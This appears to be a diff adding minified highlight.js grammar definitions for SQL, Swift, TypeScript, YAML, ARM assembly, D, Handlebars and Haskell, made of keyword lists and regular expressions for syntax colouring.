+hljs.registerLanguage("sql",function(){"use strict";return function(e){var t=e.COMMENT("--","$");return{name:"SQL",case_insensitive:!0,illegal:/[<>{}*]/,contains:[{beginKeywords:"begin end start commit rollback savepoint lock alter create drop rename call delete do handler insert load replace select truncate update set show pragma grant merge describe use explain help declare prepare execute deallocate release unlock purge reset change stop analyze cache flush optimize repair kill install uninstall checksum restore check backup revoke comment values with",end:/;/,endsWithParent:!0,keywords:{$pattern:/[\w\.]+/,keyword:"as abort abs absolute acc acce accep accept access accessed accessible account acos action activate add addtime admin administer advanced advise aes_decrypt aes_encrypt after agent aggregate ali alia alias all allocate allow alter always analyze ancillary and anti any anydata anydataset anyschema anytype apply archive archived archivelog are as asc ascii asin assembly assertion associate asynchronous at atan atn2 attr attri attrib attribu attribut attribute attributes audit authenticated authentication authid authors auto autoallocate autodblink autoextend automatic availability avg backup badfile basicfile before begin beginning benchmark between bfile bfile_base big bigfile bin binary_double binary_float binlog bit_and bit_count bit_length bit_or bit_xor bitmap blob_base block blocksize body both bound bucket buffer_cache buffer_pool build bulk by byte byteordermark bytes cache caching call calling cancel capacity cascade cascaded case cast catalog category ceil ceiling chain change changed char_base char_length character_length characters characterset charindex charset charsetform charsetid check checksum checksum_agg child choose chr chunk class cleanup clear client clob clob_base clone close cluster_id cluster_probability cluster_set clustering coalesce coercibility col collate collation collect colu colum column column_value columns columns_updated comment commit compact compatibility compiled complete composite_limit compound compress compute concat concat_ws concurrent confirm conn connec connect connect_by_iscycle connect_by_isleaf connect_by_root connect_time connection consider consistent constant constraint constraints constructor container content contents context contributors controlfile conv convert convert_tz corr corr_k corr_s corresponding corruption cos cost count count_big counted covar_pop covar_samp cpu_per_call cpu_per_session crc32 create creation critical cross cube cume_dist curdate current current_date current_time current_timestamp current_user cursor curtime customdatum cycle data database databases datafile datafiles datalength date_add date_cache date_format date_sub dateadd datediff datefromparts datename datepart datetime2fromparts day day_to_second dayname dayofmonth dayofweek dayofyear days db_role_change dbtimezone ddl deallocate declare decode decompose decrement decrypt deduplicate def defa defau defaul default defaults deferred defi defin define degrees delayed delegate delete delete_all delimited demand dense_rank depth dequeue des_decrypt des_encrypt des_key_file desc descr descri describ describe descriptor deterministic diagnostics difference dimension direct_load directory disable disable_all disallow disassociate discardfile disconnect diskgroup distinct distinctrow distribute distributed div do document domain dotnet double downgrade drop dumpfile duplicate duration each edition editionable editions element ellipsis else elsif elt empty enable enable_all enclosed encode encoding encrypt end end-exec endian enforced engine engines enqueue enterprise entityescaping eomonth error errors escaped evalname evaluate event eventdata events except exception exceptions exchange exclude excluding execu execut execute exempt exists exit exp expire explain explode export export_set extended extent external external_1 external_2 externally extract failed failed_login_attempts failover failure far fast feature_set feature_value fetch field fields file file_name_convert filesystem_like_logging final finish first first_value fixed flash_cache flashback floor flush following follows for forall force foreign form forma format found found_rows freelist freelists freepools fresh from from_base64 from_days ftp full function general generated get get_format get_lock getdate getutcdate global global_name globally go goto grant grants greatest group group_concat group_id grouping grouping_id groups gtid_subtract guarantee guard handler hash hashkeys having hea head headi headin heading heap help hex hierarchy high high_priority hosts hour hours http id ident_current ident_incr ident_seed identified identity idle_time if ifnull ignore iif ilike ilm immediate import in include including increment index indexes indexing indextype indicator indices inet6_aton inet6_ntoa inet_aton inet_ntoa infile initial initialized initially initrans inmemory inner innodb input insert install instance instantiable instr interface interleaved intersect into invalidate invisible is is_free_lock is_ipv4 is_ipv4_compat is_not is_not_null is_used_lock isdate isnull isolation iterate java join json json_exists keep keep_duplicates key keys kill language large last last_day last_insert_id last_value lateral lax lcase lead leading least leaves left len lenght length less level levels library like like2 like4 likec limit lines link list listagg little ln load load_file lob lobs local localtime localtimestamp locate locator lock locked log log10 log2 logfile logfiles logging logical logical_reads_per_call logoff logon logs long loop low low_priority lower lpad lrtrim ltrim main make_set makedate maketime managed management manual map mapping mask master master_pos_wait match matched materialized max maxextents maximize maxinstances maxlen maxlogfiles maxloghistory maxlogmembers maxsize maxtrans md5 measures median medium member memcompress memory merge microsecond mid migration min minextents minimum mining minus minute minutes minvalue missing mod mode model modification modify module monitoring month months mount move movement multiset mutex name name_const names nan national native natural nav nchar nclob nested never new newline next nextval no no_write_to_binlog noarchivelog noaudit nobadfile nocheck nocompress nocopy nocycle nodelay nodiscardfile noentityescaping noguarantee nokeep nologfile nomapping nomaxvalue nominimize nominvalue nomonitoring none noneditionable nonschema noorder nopr nopro noprom nopromp noprompt norely noresetlogs noreverse normal norowdependencies noschemacheck noswitch not nothing notice notnull notrim novalidate now nowait nth_value nullif nulls num numb numbe nvarchar nvarchar2 object ocicoll ocidate ocidatetime ociduration ociinterval ociloblocator ocinumber ociref ocirefcursor ocirowid ocistring ocitype oct octet_length of off offline offset oid oidindex old on online only opaque open operations operator optimal optimize option optionally or oracle oracle_date oradata ord ordaudio orddicom orddoc order ordimage ordinality ordvideo organization orlany orlvary out outer outfile outline output over overflow overriding package pad parallel parallel_enable parameters parent parse partial partition partitions pascal passing password password_grace_time password_lock_time password_reuse_max password_reuse_time password_verify_function patch path patindex pctincrease pctthreshold pctused pctversion percent percent_rank percentile_cont percentile_disc performance period period_add period_diff permanent physical pi pipe pipelined pivot pluggable plugin policy position post_transaction pow power pragma prebuilt precedes preceding precision prediction prediction_cost prediction_details prediction_probability prediction_set prepare present preserve prior priority private private_sga privileges procedural procedure procedure_analyze processlist profiles project prompt protection public publishingservername purge quarter query quick quiesce quota quotename radians raise rand range rank raw read reads readsize rebuild record records recover recovery recursive recycle redo reduced ref reference referenced references referencing refresh regexp_like register regr_avgx regr_avgy regr_count regr_intercept regr_r2 regr_slope regr_sxx regr_sxy reject rekey relational relative relaylog release release_lock relies_on relocate rely rem remainder rename repair repeat replace replicate replication required reset resetlogs resize resource respect restore restricted result result_cache resumable resume retention return returning returns reuse reverse revoke right rlike role roles rollback rolling rollup round row row_count rowdependencies rowid rownum rows rtrim rules safe salt sample save savepoint sb1 sb2 sb4 scan schema schemacheck scn scope scroll sdo_georaster sdo_topo_geometry search sec_to_time second seconds section securefile security seed segment select self semi sequence sequential serializable server servererror session session_user sessions_per_user set sets settings sha sha1 sha2 share shared shared_pool short show shrink shutdown si_averagecolor si_colorhistogram si_featurelist si_positionalcolor si_stillimage si_texture siblings sid sign sin size size_t sizes skip slave sleep smalldatetimefromparts smallfile snapshot some soname sort soundex source space sparse spfile split sql sql_big_result sql_buffer_result sql_cache sql_calc_found_rows sql_small_result sql_variant_property sqlcode sqldata sqlerror sqlname sqlstate sqrt square standalone standby start starting startup statement static statistics stats_binomial_test stats_crosstab stats_ks_test stats_mode stats_mw_test stats_one_way_anova stats_t_test_ stats_t_test_indep stats_t_test_one stats_t_test_paired stats_wsr_test status std stddev stddev_pop stddev_samp stdev stop storage store stored str str_to_date straight_join strcmp strict string struct stuff style subdate subpartition subpartitions substitutable substr substring subtime subtring_index subtype success sum suspend switch switchoffset switchover sync synchronous synonym sys sys_xmlagg sysasm sysaux sysdate sysdatetimeoffset sysdba sysoper system system_user sysutcdatetime table tables tablespace tablesample tan tdo template temporary terminated tertiary_weights test than then thread through tier ties time time_format time_zone timediff timefromparts timeout timestamp timestampadd timestampdiff timezone_abbr timezone_minute timezone_region to to_base64 to_date to_days to_seconds todatetimeoffset trace tracking transaction transactional translate translation treat trigger trigger_nestlevel triggers trim truncate try_cast try_convert try_parse type ub1 ub2 ub4 ucase unarchived unbounded uncompress under undo unhex unicode uniform uninstall union unique unix_timestamp unknown unlimited unlock unnest unpivot unrecoverable unsafe unsigned until untrusted unusable unused update updated upgrade upped upper upsert url urowid usable usage use use_stored_outlines user user_data user_resources users using utc_date utc_timestamp uuid uuid_short validate validate_password_strength validation valist value values var var_samp varcharc vari varia variab variabl variable variables variance varp varraw varrawc varray verify version versions view virtual visible void wait wallet warning warnings week weekday weekofyear wellformed when whene whenev wheneve whenever where while whitespace window with within without work wrapped xdb xml xmlagg xmlattributes xmlcast xmlcolattval xmlelement xmlexists xmlforest xmlindex xmlnamespaces xmlpi xmlquery xmlroot xmlschema xmlserialize xmltable xmltype xor year year_to_month years yearweek",literal:"true false null unknown",built_in:"array bigint binary bit blob bool boolean char character date dec decimal float int int8 integer interval number numeric real record serial serial8 smallint text time timestamp tinyint varchar varchar2 varying void"},contains:[{className:"string",begin:"'",end:"'",contains:[{begin:"''"}]},{className:"string",begin:'"',end:'"',contains:[{begin:'""'}]},{className:"string",begin:"`",end:"`"},e.C_NUMBER_MODE,e.C_BLOCK_COMMENT_MODE,t,e.HASH_COMMENT_MODE]},e.C_BLOCK_COMMENT_MODE,t,e.HASH_COMMENT_MODE]}}}());
+hljs.registerLanguage("swift",function(){"use strict";return function(e){var i={keyword:"#available #colorLiteral #column #else #elseif #endif #file #fileLiteral #function #if #imageLiteral #line #selector #sourceLocation _ __COLUMN__ __FILE__ __FUNCTION__ __LINE__ Any as as! as? associatedtype associativity break case catch class continue convenience default defer deinit didSet do dynamic dynamicType else enum extension fallthrough false fileprivate final for func get guard if import in indirect infix init inout internal is lazy left let mutating nil none nonmutating open operator optional override postfix precedence prefix private protocol Protocol public repeat required rethrows return right self Self set static struct subscript super switch throw throws true try try! try? Type typealias unowned var weak where while willSet",literal:"true false nil",built_in:"abs advance alignof alignofValue anyGenerator assert assertionFailure bridgeFromObjectiveC bridgeFromObjectiveCUnconditional bridgeToObjectiveC bridgeToObjectiveCUnconditional c compactMap contains count countElements countLeadingZeros debugPrint debugPrintln distance dropFirst dropLast dump encodeBitsAsWords enumerate equal fatalError filter find getBridgedObjectiveCType getVaList indices insertionSort isBridgedToObjectiveC isBridgedVerbatimToObjectiveC isUniquelyReferenced isUniquelyReferencedNonObjC join lazy lexicographicalCompare map max maxElement min minElement numericCast overlaps partition posix precondition preconditionFailure print println quickSort readLine reduce reflect reinterpretCast reverse roundUpToAlignment sizeof sizeofValue sort split startsWith stride strideof strideofValue swap toString transcode underestimateCount unsafeAddressOf unsafeBitCast unsafeDowncast unsafeUnwrap unsafeReflect withExtendedLifetime withObjectAtPlusZero withUnsafePointer withUnsafePointerToObject withUnsafeMutablePointer withUnsafeMutablePointers withUnsafePointer withUnsafePointers withVaList zip"},n=e.COMMENT("/\\*","\\*/",{contains:["self"]}),t={className:"subst",begin:/\\\(/,end:"\\)",keywords:i,contains:[]},a={className:"string",contains:[e.BACKSLASH_ESCAPE,t],variants:[{begin:/"""/,end:/"""/},{begin:/"/,end:/"/}]},r={className:"number",begin:"\\b([\\d_]+(\\.[\\deE_]+)?|0x[a-fA-F0-9_]+(\\.[a-fA-F0-9p_]+)?|0b[01_]+|0o[0-7_]+)\\b",relevance:0};return t.contains=[r],{name:"Swift",keywords:i,contains:[a,e.C_LINE_COMMENT_MODE,n,{className:"type",begin:"\\b[A-Z][\\wÀ-ʸ']*[!?]"},{className:"type",begin:"\\b[A-Z][\\wÀ-ʸ']*",relevance:0},r,{className:"function",beginKeywords:"func",end:"{",excludeEnd:!0,contains:[e.inherit(e.TITLE_MODE,{begin:/[A-Za-z$_][0-9A-Za-z$_]*/}),{begin://},{className:"params",begin:/\(/,end:/\)/,endsParent:!0,keywords:i,contains:["self",r,a,e.C_BLOCK_COMMENT_MODE,{begin:":"}],illegal:/["']/}],illegal:/\[|%/},{className:"class",beginKeywords:"struct protocol class extension enum",keywords:i,end:"\\{",excludeEnd:!0,contains:[e.inherit(e.TITLE_MODE,{begin:/[A-Za-z$_][\u00C0-\u02B80-9A-Za-z$_]*/})]},{className:"meta",begin:"(@discardableResult|@warn_unused_result|@exported|@lazy|@noescape|@NSCopying|@NSManaged|@objc|@objcMembers|@convention|@required|@noreturn|@IBAction|@IBDesignable|@IBInspectable|@IBOutlet|@infix|@prefix|@postfix|@autoclosure|@testable|@available|@nonobjc|@NSApplicationMain|@UIApplicationMain|@dynamicMemberLookup|@propertyWrapper)\\b"},{beginKeywords:"import",end:/$/,contains:[e.C_LINE_COMMENT_MODE,n]}]}}}());
+hljs.registerLanguage("typescript",function(){"use strict";const e=["as","in","of","if","for","while","finally","var","new","function","do","return","void","else","break","catch","instanceof","with","throw","case","default","try","switch","continue","typeof","delete","let","yield","const","class","debugger","async","await","static","import","from","export","extends"],n=["true","false","null","undefined","NaN","Infinity"],a=[].concat(["setInterval","setTimeout","clearInterval","clearTimeout","require","exports","eval","isFinite","isNaN","parseFloat","parseInt","decodeURI","decodeURIComponent","encodeURI","encodeURIComponent","escape","unescape"],["arguments","this","super","console","window","document","localStorage","module","global"],["Intl","DataView","Number","Math","Date","String","RegExp","Object","Function","Boolean","Error","Symbol","Set","Map","WeakSet","WeakMap","Proxy","Reflect","JSON","Promise","Float64Array","Int16Array","Int32Array","Int8Array","Uint16Array","Uint32Array","Float32Array","Array","Uint8Array","Uint8ClampedArray","ArrayBuffer"],["EvalError","InternalError","RangeError","ReferenceError","SyntaxError","TypeError","URIError"]);return function(r){var t={$pattern:"[A-Za-z$_][0-9A-Za-z$_]*",keyword:e.concat(["type","namespace","typedef","interface","public","private","protected","implements","declare","abstract","readonly"]).join(" "),literal:n.join(" "),built_in:a.concat(["any","void","number","boolean","string","object","never","enum"]).join(" ")},s={className:"meta",begin:"@[A-Za-z$_][0-9A-Za-z$_]*"},i={className:"number",variants:[{begin:"\\b(0[bB][01]+)n?"},{begin:"\\b(0[oO][0-7]+)n?"},{begin:r.C_NUMBER_RE+"n?"}],relevance:0},o={className:"subst",begin:"\\$\\{",end:"\\}",keywords:t,contains:[]},c={begin:"html`",end:"",starts:{end:"`",returnEnd:!1,contains:[r.BACKSLASH_ESCAPE,o],subLanguage:"xml"}},l={begin:"css`",end:"",starts:{end:"`",returnEnd:!1,contains:[r.BACKSLASH_ESCAPE,o],subLanguage:"css"}},E={className:"string",begin:"`",end:"`",contains:[r.BACKSLASH_ESCAPE,o]};o.contains=[r.APOS_STRING_MODE,r.QUOTE_STRING_MODE,c,l,E,i,r.REGEXP_MODE];var d={begin:"\\(",end:/\)/,keywords:t,contains:["self",r.QUOTE_STRING_MODE,r.APOS_STRING_MODE,r.NUMBER_MODE]},u={className:"params",begin:/\(/,end:/\)/,excludeBegin:!0,excludeEnd:!0,keywords:t,contains:[r.C_LINE_COMMENT_MODE,r.C_BLOCK_COMMENT_MODE,s,d]};return{name:"TypeScript",aliases:["ts"],keywords:t,contains:[r.SHEBANG(),{className:"meta",begin:/^\s*['"]use strict['"]/},r.APOS_STRING_MODE,r.QUOTE_STRING_MODE,c,l,E,r.C_LINE_COMMENT_MODE,r.C_BLOCK_COMMENT_MODE,i,{begin:"("+r.RE_STARTERS_RE+"|\\b(case|return|throw)\\b)\\s*",keywords:"return throw case",contains:[r.C_LINE_COMMENT_MODE,r.C_BLOCK_COMMENT_MODE,r.REGEXP_MODE,{className:"function",begin:"(\\([^(]*(\\([^(]*(\\([^(]*\\))?\\))?\\)|"+r.UNDERSCORE_IDENT_RE+")\\s*=>",returnBegin:!0,end:"\\s*=>",contains:[{className:"params",variants:[{begin:r.UNDERSCORE_IDENT_RE},{className:null,begin:/\(\s*\)/,skip:!0},{begin:/\(/,end:/\)/,excludeBegin:!0,excludeEnd:!0,keywords:t,contains:d.contains}]}]}],relevance:0},{className:"function",beginKeywords:"function",end:/[\{;]/,excludeEnd:!0,keywords:t,contains:["self",r.inherit(r.TITLE_MODE,{begin:"[A-Za-z$_][0-9A-Za-z$_]*"}),u],illegal:/%/,relevance:0},{beginKeywords:"constructor",end:/[\{;]/,excludeEnd:!0,contains:["self",u]},{begin:/module\./,keywords:{built_in:"module"},relevance:0},{beginKeywords:"module",end:/\{/,excludeEnd:!0},{beginKeywords:"interface",end:/\{/,excludeEnd:!0,keywords:"interface extends"},{begin:/\$[(.]/},{begin:"\\."+r.IDENT_RE,relevance:0},s,d]}}}());
+hljs.registerLanguage("yaml",function(){"use strict";return function(e){var n="true false yes no null",a="[\\w#;/?:@&=+$,.~*\\'()[\\]]+",s={className:"string",relevance:0,variants:[{begin:/'/,end:/'/},{begin:/"/,end:/"/},{begin:/\S+/}],contains:[e.BACKSLASH_ESCAPE,{className:"template-variable",variants:[{begin:"{{",end:"}}"},{begin:"%{",end:"}"}]}]},i=e.inherit(s,{variants:[{begin:/'/,end:/'/},{begin:/"/,end:/"/},{begin:/[^\s,{}[\]]+/}]}),l={end:",",endsWithParent:!0,excludeEnd:!0,contains:[],keywords:n,relevance:0},t={begin:"{",end:"}",contains:[l],illegal:"\\n",relevance:0},g={begin:"\\[",end:"\\]",contains:[l],illegal:"\\n",relevance:0},b=[{className:"attr",variants:[{begin:"\\w[\\w :\\/.-]*:(?=[ \t]|$)"},{begin:'"\\w[\\w :\\/.-]*":(?=[ \t]|$)'},{begin:"'\\w[\\w :\\/.-]*':(?=[ \t]|$)"}]},{className:"meta",begin:"^---s*$",relevance:10},{className:"string",begin:"[\\|>]([0-9]?[+-])?[ ]*\\n( *)[\\S ]+\\n(\\2[\\S ]+\\n?)*"},{begin:"<%[%=-]?",end:"[%-]?%>",subLanguage:"ruby",excludeBegin:!0,excludeEnd:!0,relevance:0},{className:"type",begin:"!\\w+!"+a},{className:"type",begin:"!<"+a+">"},{className:"type",begin:"!"+a},{className:"type",begin:"!!"+a},{className:"meta",begin:"&"+e.UNDERSCORE_IDENT_RE+"$"},{className:"meta",begin:"\\*"+e.UNDERSCORE_IDENT_RE+"$"},{className:"bullet",begin:"\\-(?=[ ]|$)",relevance:0},e.HASH_COMMENT_MODE,{beginKeywords:n,keywords:{literal:n}},{className:"number",begin:"\\b[0-9]{4}(-[0-9][0-9]){0,2}([Tt \\t][0-9][0-9]?(:[0-9][0-9]){2})?(\\.[0-9]*)?([ \\t])*(Z|[-+][0-9][0-9]?(:[0-9][0-9])?)?\\b"},{className:"number",begin:e.C_NUMBER_RE+"\\b"},t,g,s],c=[...b];return c.pop(),c.push(i),l.contains=c,{name:"YAML",case_insensitive:!0,aliases:["yml","YAML"],contains:b}}}());
+hljs.registerLanguage("armasm",function(){"use strict";return function(s){const e={variants:[s.COMMENT("^[ \\t]*(?=#)","$",{relevance:0,excludeBegin:!0}),s.COMMENT("[;@]","$",{relevance:0}),s.C_LINE_COMMENT_MODE,s.C_BLOCK_COMMENT_MODE]};return{name:"ARM Assembly",case_insensitive:!0,aliases:["arm"],keywords:{$pattern:"\\.?"+s.IDENT_RE,meta:".2byte .4byte .align .ascii .asciz .balign .byte .code .data .else .end .endif .endm .endr .equ .err .exitm .extern .global .hword .if .ifdef .ifndef .include .irp .long .macro .rept .req .section .set .skip .space .text .word .arm .thumb .code16 .code32 .force_thumb .thumb_func .ltorg ALIAS ALIGN ARM AREA ASSERT ATTR CN CODE CODE16 CODE32 COMMON CP DATA DCB DCD DCDU DCDO DCFD DCFDU DCI DCQ DCQU DCW DCWU DN ELIF ELSE END ENDFUNC ENDIF ENDP ENTRY EQU EXPORT EXPORTAS EXTERN FIELD FILL FUNCTION GBLA GBLL GBLS GET GLOBAL IF IMPORT INCBIN INCLUDE INFO KEEP LCLA LCLL LCLS LTORG MACRO MAP MEND MEXIT NOFP OPT PRESERVE8 PROC QN READONLY RELOC REQUIRE REQUIRE8 RLIST FN ROUT SETA SETL SETS SN SPACE SUBT THUMB THUMBX TTL WHILE WEND ",built_in:"r0 r1 r2 r3 r4 r5 r6 r7 r8 r9 r10 r11 r12 r13 r14 r15 pc lr sp ip sl sb fp a1 a2 a3 a4 v1 v2 v3 v4 v5 v6 v7 v8 f0 f1 f2 f3 f4 f5 f6 f7 p0 p1 p2 p3 p4 p5 p6 p7 p8 p9 p10 p11 p12 p13 p14 p15 c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 c10 c11 c12 c13 c14 c15 q0 q1 q2 q3 q4 q5 q6 q7 q8 q9 q10 q11 q12 q13 q14 q15 cpsr_c cpsr_x cpsr_s cpsr_f cpsr_cx cpsr_cxs cpsr_xs cpsr_xsf cpsr_sf cpsr_cxsf spsr_c spsr_x spsr_s spsr_f spsr_cx spsr_cxs spsr_xs spsr_xsf spsr_sf spsr_cxsf s0 s1 s2 s3 s4 s5 s6 s7 s8 s9 s10 s11 s12 s13 s14 s15 s16 s17 s18 s19 s20 s21 s22 s23 s24 s25 s26 s27 s28 s29 s30 s31 d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 d10 d11 d12 d13 d14 d15 d16 d17 d18 d19 d20 d21 d22 d23 d24 d25 d26 d27 d28 d29 d30 d31 {PC} {VAR} {TRUE} {FALSE} {OPT} {CONFIG} {ENDIAN} {CODESIZE} {CPU} {FPU} {ARCHITECTURE} {PCSTOREOFFSET} {ARMASM_VERSION} {INTER} {ROPI} {RWPI} {SWST} {NOSWST} . @"},contains:[{className:"keyword",begin:"\\b(adc|(qd?|sh?|u[qh]?)?add(8|16)?|usada?8|(q|sh?|u[qh]?)?(as|sa)x|and|adrl?|sbc|rs[bc]|asr|b[lx]?|blx|bxj|cbn?z|tb[bh]|bic|bfc|bfi|[su]bfx|bkpt|cdp2?|clz|clrex|cmp|cmn|cpsi[ed]|cps|setend|dbg|dmb|dsb|eor|isb|it[te]{0,3}|lsl|lsr|ror|rrx|ldm(([id][ab])|f[ds])?|ldr((s|ex)?[bhd])?|movt?|mvn|mra|mar|mul|[us]mull|smul[bwt][bt]|smu[as]d|smmul|smmla|mla|umlaal|smlal?([wbt][bt]|d)|mls|smlsl?[ds]|smc|svc|sev|mia([bt]{2}|ph)?|mrr?c2?|mcrr2?|mrs|msr|orr|orn|pkh(tb|bt)|rbit|rev(16|sh)?|sel|[su]sat(16)?|nop|pop|push|rfe([id][ab])?|stm([id][ab])?|str(ex)?[bhd]?|(qd?)?sub|(sh?|q|u[qh]?)?sub(8|16)|[su]xt(a?h|a?b(16)?)|srs([id][ab])?|swpb?|swi|smi|tst|teq|wfe|wfi|yield)(eq|ne|cs|cc|mi|pl|vs|vc|hi|ls|ge|lt|gt|le|al|hs|lo)?[sptrx]?(?=\\s)"},e,s.QUOTE_STRING_MODE,{className:"string",begin:"'",end:"[^\\\\]'",relevance:0},{className:"title",begin:"\\|",end:"\\|",illegal:"\\n",relevance:0},{className:"number",variants:[{begin:"[#$=]?0x[0-9a-f]+"},{begin:"[#$=]?0b[01]+"},{begin:"[#$=]\\d+"},{begin:"\\b\\d+"}],relevance:0},{className:"symbol",variants:[{begin:"^[ \\t]*[a-z_\\.\\$][a-z0-9_\\.\\$]+:"},{begin:"^[a-z_\\.\\$][a-z0-9_\\.\\$]+"},{begin:"[=#]\\w+"}],relevance:0}]}}}());
+hljs.registerLanguage("d",function(){"use strict";return function(e){var a={$pattern:e.UNDERSCORE_IDENT_RE,keyword:"abstract alias align asm assert auto body break byte case cast catch class const continue debug default delete deprecated do else enum export extern final finally for foreach foreach_reverse|10 goto if immutable import in inout int interface invariant is lazy macro mixin module new nothrow out override package pragma private protected public pure ref return scope shared static struct super switch synchronized template this throw try typedef typeid typeof union unittest version void volatile while with __FILE__ __LINE__ __gshared|10 __thread __traits __DATE__ __EOF__ __TIME__ __TIMESTAMP__ __VENDOR__ __VERSION__",built_in:"bool cdouble cent cfloat char creal dchar delegate double dstring float function idouble ifloat ireal long real short string ubyte ucent uint ulong ushort wchar wstring",literal:"false null true"},d="((0|[1-9][\\d_]*)|0[bB][01_]+|0[xX]([\\da-fA-F][\\da-fA-F_]*|_[\\da-fA-F][\\da-fA-F_]*))",n="\\\\(['\"\\?\\\\abfnrtv]|u[\\dA-Fa-f]{4}|[0-7]{1,3}|x[\\dA-Fa-f]{2}|U[\\dA-Fa-f]{8})|&[a-zA-Z\\d]{2,};",t={className:"number",begin:"\\b"+d+"(L|u|U|Lu|LU|uL|UL)?",relevance:0},_={className:"number",begin:"\\b(((0[xX](([\\da-fA-F][\\da-fA-F_]*|_[\\da-fA-F][\\da-fA-F_]*)\\.([\\da-fA-F][\\da-fA-F_]*|_[\\da-fA-F][\\da-fA-F_]*)|\\.?([\\da-fA-F][\\da-fA-F_]*|_[\\da-fA-F][\\da-fA-F_]*))[pP][+-]?(0|[1-9][\\d_]*|\\d[\\d_]*|[\\d_]+?\\d))|((0|[1-9][\\d_]*|\\d[\\d_]*|[\\d_]+?\\d)(\\.\\d*|([eE][+-]?(0|[1-9][\\d_]*|\\d[\\d_]*|[\\d_]+?\\d)))|\\d+\\.(0|[1-9][\\d_]*|\\d[\\d_]*|[\\d_]+?\\d)(0|[1-9][\\d_]*|\\d[\\d_]*|[\\d_]+?\\d)|\\.(0|[1-9][\\d_]*)([eE][+-]?(0|[1-9][\\d_]*|\\d[\\d_]*|[\\d_]+?\\d))?))([fF]|L|i|[fF]i|Li)?|"+d+"(i|[fF]i|Li))",relevance:0},r={className:"string",begin:"'("+n+"|.)",end:"'",illegal:"."},i={className:"string",begin:'"',contains:[{begin:n,relevance:0}],end:'"[cwd]?'},s=e.COMMENT("\\/\\+","\\+\\/",{contains:["self"],relevance:10});return{name:"D",keywords:a,contains:[e.C_LINE_COMMENT_MODE,e.C_BLOCK_COMMENT_MODE,s,{className:"string",begin:'x"[\\da-fA-F\\s\\n\\r]*"[cwd]?',relevance:10},i,{className:"string",begin:'[rq]"',end:'"[cwd]?',relevance:5},{className:"string",begin:"`",end:"`[cwd]?"},{className:"string",begin:'q"\\{',end:'\\}"'},_,t,r,{className:"meta",begin:"^#!",end:"$",relevance:5},{className:"meta",begin:"#(line)",end:"$",relevance:5},{className:"keyword",begin:"@[a-zA-Z_][a-zA-Z_\\d]*"}]}}}());
+hljs.registerLanguage("handlebars",function(){"use strict";function e(...e){return e.map(e=>(function(e){return e?"string"==typeof e?e:e.source:null})(e)).join("")}return function(n){const a={"builtin-name":"action bindattr collection component concat debugger each each-in get hash if in input link-to loc log lookup mut outlet partial query-params render template textarea unbound unless view with yield"},t=/\[.*?\]/,s=/[^\s!"#%&'()*+,.\/;<=>@\[\\\]^`{|}~]+/,i=e("(",/'.*?'/,"|",/".*?"/,"|",t,"|",s,"|",/\.|\//,")+"),r=e("(",t,"|",s,")(?==)"),l={begin:i,lexemes:/[\w.\/]+/},c=n.inherit(l,{keywords:{literal:"true false undefined null"}}),o={begin:/\(/,end:/\)/},m={className:"attr",begin:r,relevance:0,starts:{begin:/=/,end:/=/,starts:{contains:[n.NUMBER_MODE,n.QUOTE_STRING_MODE,n.APOS_STRING_MODE,c,o]}}},d={contains:[n.NUMBER_MODE,n.QUOTE_STRING_MODE,n.APOS_STRING_MODE,{begin:/as\s+\|/,keywords:{keyword:"as"},end:/\|/,contains:[{begin:/\w+/}]},m,c,o],returnEnd:!0},g=n.inherit(l,{className:"name",keywords:a,starts:n.inherit(d,{end:/\)/})});o.contains=[g];const u=n.inherit(l,{keywords:a,className:"name",starts:n.inherit(d,{end:/}}/})}),b=n.inherit(l,{keywords:a,className:"name"}),h=n.inherit(l,{className:"name",keywords:a,starts:n.inherit(d,{end:/}}/})});return{name:"Handlebars",aliases:["hbs","html.hbs","html.handlebars","htmlbars"],case_insensitive:!0,subLanguage:"xml",contains:[{begin:/\\\{\{/,skip:!0},{begin:/\\\\(?=\{\{)/,skip:!0},n.COMMENT(/\{\{!--/,/--\}\}/),n.COMMENT(/\{\{!/,/\}\}/),{className:"template-tag",begin:/\{\{\{\{(?!\/)/,end:/\}\}\}\}/,contains:[u],starts:{end:/\{\{\{\{\//,returnEnd:!0,subLanguage:"xml"}},{className:"template-tag",begin:/\{\{\{\{\//,end:/\}\}\}\}/,contains:[b]},{className:"template-tag",begin:/\{\{#/,end:/\}\}/,contains:[u]},{className:"template-tag",begin:/\{\{(?=else\}\})/,end:/\}\}/,keywords:"else"},{className:"template-tag",begin:/\{\{\//,end:/\}\}/,contains:[b]},{className:"template-variable",begin:/\{\{\{/,end:/\}\}\}/,contains:[h]},{className:"template-variable",begin:/\{\{/,end:/\}\}/,contains:[h]}]}}}());
+hljs.registerLanguage("haskell",function(){"use strict";return function(e){var n={variants:[e.COMMENT("--","$"),e.COMMENT("{-","-}",{contains:["self"]})]},i={className:"meta",begin:"{-#",end:"#-}"},a={className:"meta",begin:"^#",end:"$"},s={className:"type",begin:"\\b[A-Z][\\w']*",relevance:0},l={begin:"\\(",end:"\\)",illegal:'"',contains:[i,a,{className:"type",begin:"\\b[A-Z][\\w]*(\\((\\.\\.|,|\\w+)\\))?"},e.inherit(e.TITLE_MODE,{begin:"[_a-z][\\w']*"}),n]};return{name:"Haskell",aliases:["hs"],keywords:"let in if then else case of where do module import hiding qualified type data newtype deriving class instance as default infix infixl infixr foreign export ccall stdcall cplusplus jvm dotnet safe unsafe family forall mdo proc rec",contains:[{beginKeywords:"module",end:"where",keywords:"module where",contains:[l,n],illegal:"\\W\\.|;"},{begin:"\\bimport\\b",end:"$",keywords:"import qualified as hiding",contains:[l,n],illegal:"\\W\\.|;"},{className:"class",begin:"^(\\s*)?(class|instance)\\b",end:"where",keywords:"class family instance where",contains:[s,l,n]},{className:"class",begin:"\\b(data|(new)?type)\\b",end:"$",keywords:"data family type newtype deriving",contains:[i,s,l,{begin:"{",end:"}",contains:l.contains},n]},{beginKeywords:"default",end:"$",contains:[s,l,n]},{beginKeywords:"infix infixl infixr",end:"$",contains:[e.C_NUMBER_MODE,n]},{begin:"\\bforeign\\b",end:"$",keywords:"foreign import export ccall stdcall cplusplus jvm dotnet safe unsafe",contains:[s,e.QUOTE_STRING_MODE,n]},{className:"meta",begin:"#!\\/usr\\/bin\\/env runhaskell",end:"$"},i,a,e.QUOTE_STRING_MODE,e.C_NUMBER_MODE,s,e.inherit(e.TITLE_MODE,{begin:"^[_a-z][\\w']*"}),n,{begin:"->|<-"}]}}}());
